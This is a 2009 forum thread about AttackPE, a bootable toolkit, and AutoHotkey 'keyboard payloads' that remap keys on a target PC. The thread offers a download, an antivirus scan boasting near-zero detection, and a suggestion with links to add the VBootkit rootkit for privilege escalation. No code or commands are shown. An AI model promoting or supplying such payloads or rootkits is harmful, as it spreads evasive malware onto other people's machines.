options...
pritchard9 Posted April 15, 2009 Share Posted April 15, 2009 Awesome project man. Definately gonna keep track of this. I should have just released it as is. Never too late, Darren... ;) Quote Link to comment Share on other sites More sharing options...
sablefoxx Posted April 21, 2009 Author Share Posted April 21, 2009 Wonder if i could get a few people to test the new payload install method, made a nice little GUI. This is just a few keyboard payloads i made while playing around with AHK (lots of fun btw!). Patch it into your AttackPE.iso file and select "PE" under mode to install payloads from PE otherwise select "Normal" mode. Note: You may need to runas an admin in vista if uac is enabled (and not in pe)! Features; 1. All Keyboard Payloads Included in One Small .exe 2. Built In Removal Tools 3. GUI (Simple) 4. Install payloads from Normal Mode or P.E. 5. Auto detects if you're in Normal or P.E. (v1.2+) 6. You do NOT need AttackPE to use these payloads! Planning on converting all the payloads to something like this, so let me know what you think! Download: Compiled && Source (v1.2) Detection Rate: Antivirus Version Last Update Result a-squared 4.0.0.101 2009.04.21 - AhnLab-V3 5.0.0.2 2009.04.21 - AntiVir 7.9.0.148 2009.04.20 - Antiy-AVL 2.0.3.1 2009.04.20 - Authentium 5.1.2.4 2009.04.20 - Avast 4.8.1335.0 2009.04.20 - AVG 8.5.0.287 2009.04.20 - BitDefender 7.2 2009.04.21 - CAT-QuickHeal 10.00 2009.04.21 - ClamAV 0.94.1 2009.04.21 - Comodo 1123 2009.04.20 - DrWeb 4.44.0.09170 2009.04.21 - eSafe 7.0.17.0 2009.04.20 - Suspicious File eTrust-Vet 31.6.6440 2009.04.20 - F-Prot 4.4.4.56 2009.04.20 - F-Secure 8.0.14470.0 2009.04.21 - Fortinet 3.117.0.0 2009.04.21 - GData 19 2009.04.21 - Ikarus T3.1.1.49.0 2009.04.21 - K7AntiVirus 7.10.709 2009.04.20 - Kaspersky 7.0.0.125 2009.04.21 - McAfee 5590 2009.04.20 - McAfee+Artemis 5590 2009.04.20 - McAfee-GW-Edition 6.7.6 2009.04.21 - Microsoft 1.4602 2009.04.21 - NOD32 4023 2009.04.20 - Norman 6.00.06 2009.04.20 - nProtect 2009.1.8.0 2009.04.20 - Panda 10.0.0.14 2009.04.20 - PCTools 4.4.2.0 2009.04.21 - Prevx1 V2 2009.04.21 - Rising 21.26.10.00 2009.04.21 - Sophos 4.40.0 2009.04.21 - Sunbelt 3.2.1858.2 2009.04.18 - Symantec 1.4.4.12 2009.04.21 - TheHacker 6.3.4.0.312 2009.04.21 - TrendMicro 8.700.0.1004 2009.04.21 - VBA32 3.12.10.2 2009.04.21 - ViRobot 2009.4.21.1701 2009.04.21 - VirusBuster 4.6.5.0 2009.04.20 - Total: 2.5% (Suspicious File Only) Quote Link to comment Share on other sites More sharing options...
D3XTA Posted April 23, 2009 Share Posted April 23, 2009 Hi, been reading these forums for a while now so decided to join so i can contribute and learn a bit more. :). any way... sable i tried your payloads ui and they work perfect but i cannot seem to disable th epayload once its activated. it says its removed but i still get binary lol :). any ideas EDIT: also forgot to say sophos does not detect a thing. bonus Quote Link to comment Share on other sites More sharing options...
DingleBerries Posted April 23, 2009 Share Posted April 23, 2009 SableFoxx, Why not add something like the VBrootkit? It takes control of windows boot process to allow privilege escalation? Here is the source: http://www.nvlabs.in/archives/5-BOOT-KIT-C...Subversion.html And the white paper: http://www.nvlabs.in/uploads/projects/vboo..._whitepaper.pdf Here is a compiled version, not yet tested: http://www.mediafire.com/download.php?2zrkzmuakyn Quote Link to comment Share on other sites More sharing options...
sablefoxx Posted April 24, 2009 Author Share Posted April 24, 2009 Hi, been reading these forums for a while now so decided to join so i can contribute and learn a bit more. :). any way... sable i tried your payloads ui and they work perfect but i cannot seem to disable th epayload once its activated. it says its removed but i still get binary lol :). any ideas EDIT: also forgot to say sophos does not detect a thing. bonus My bad, press the Windows Key + X (keyr.exe does NOT remap the 'x' key by default) to stop all the keyboard payloads this only tmp stops the payload that is running, then run removal. Also if you're running vista you may need to run the keybrd_pl.exe 'as admin'. Thx for the input, ill make a fix for this. There are also some bugs in keyr.exe i'll be posting updates soon. @DingleBerries, internesting... very interesting... 4/25/09 Edit: Released updated v1.2 fixes bugs with Keyr and removal not working correctly after payload was activated Quote Link to comment Share on other sites More sharing options...
pritchard9 Posted April 27, 2009 Share Posted April 27, 2009 Is there an antidote? I'd love to test this on my current PC, but lack the hardware spec to run a VM. Quote Link to comment Share on other sites More sharing options...
sablefoxx Posted April 27, 2009 Author Share Posted April 27, 2009 almost everything has a removal tool (only the cmdo payload does not) the updated version im working on now will fix that. but certainly anytime you boot into a PE a couple wrong clicks, or commands can break the local os, so be careful *shakes finger* the new keyboard payloads have a built-in removal tool as of 1.2 it actually works :) Quote Link to comment Share on other sites More sharing options...
pritchard9 Posted April 27, 2009 Share Posted April 27, 2009 almost everything has a removal tool (only the cmdo payload does not) the updated version im working on now will fix that. but certainly anytime you boot into a PE a couple wrong clicks, or commands can break the local os. the new keyboard payloads have a built-in removal tool Thanks for such a speedy reply. Great project. :) Quote Link to comment Share on other sites More sharing options...
pritchard9 Posted April 29, 2009 Share Posted April 29, 2009 Sorry for double post. I tried to install this, but could boot to my USB drive on my home PC. The PC is normally a bit of a tough one for booting to USB - even after disabling the HD in the BIOS, it fails to detect the OS on the USB, and magically boots to vista :(. I even booted into Puppy Linux to make the USB partition bootable - still nothing. Any help would be great. Thanks. Quote Link to comment Share on other sites More sharing options...
sablefoxx Posted April 29, 2009 Author Share Posted April 29, 2009 Sorry for double post. I tried to install this, but could boot to my USB drive on my home PC. The PC is normally a bit of a tough one for booting to USB - even after disabling the HD in the BIOS, it fails to detect the OS on the USB, and magically boots to vista :(. I even booted into Puppy Linux to make the USB partition bootable - still nothing. Any help would be great. Thanks. In my experience sometimes APE just won't boot on some systems, and im not sure how to fix that. However here are a few tricks you can try; 1. Use a different USB drive, sometimes its the drive itself not the computer 2. Disable USB Legacy support in the BIOS (not every bios has this) If anyone else has found some cool tricks please post them. Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.